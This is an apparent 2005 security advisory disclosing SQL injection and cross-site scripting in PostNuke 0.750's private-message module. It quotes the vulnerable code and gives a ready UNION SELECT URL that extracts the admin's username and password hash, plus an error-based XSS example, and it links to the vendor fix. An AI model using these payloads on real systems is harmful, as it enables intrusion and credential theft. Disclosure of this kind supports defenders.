-=[ Critical SQL injection and XSS in PostNuke ]=- Author: sp3x Date: 27. May 2005 Affected software : =================== PostNuke version : x=> 0.750 Description : ============= PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ Vulnerabilities : ***************** Critical SQL injection : ======================== Code : ------ /modules/Messages/readpmsg.php ======================= $sql = "SELECT $column[msg_id] AS \"msg_id\", $column[msg_image] AS \"msg_image\", $column[subject] AS \"subject\", $column[from_userid] AS \"from_userid\", $column[to_userid] AS \"to_userid\", $column[msg_time] AS \"msg_time\", $column[msg_text] AS \"msg_text\", $column[read_msg] AS \"read_msg\" FROM $pntable[priv_msgs] WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'"; $resultID =& $dbconn->SelectLimit($sql,1,$start); if($dbconn->ErrorNo()<>0) { error_log("DB Error: " . $dbconn->ErrorMsg()); echo $dbconn->ErrorMsg() . "
"; forumerror(0005); } ======================= First lets login -in as user in postnuke. Then send the message to yourself. After that go to : http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1 Note : ------ total_messages=1 - the id of total_messages must exist Now you will see this error message error message : --------------- ======================== You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[SQL injection],1' at line 10 ======================== Exploit SQL injection : ======================= http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1 And we can see the admin md5 password and nick :) Cross-site scripting - XSS : ============================ Thanks to error message we can also perform XSS attacks :) Example : --------- http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'

cXIb8O3 and sp3x - SecurityReason

&total_messages=1 And we get : error message : --------------- ======================== You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''[Our XSS],1' at line 10 ======================== How to fix : ============ PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format) http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html SHA1: 6e76d92124c833618d02dfdb87d699374120967d MD5: a007e741be11389a986b1d8928a6c0e5 Size: 160550 Bytes or CVS Greets : ======== cXIb8O3 and pkw :) Contact : ========= sp3x[at]securityreason[dot].com www.securityreason.com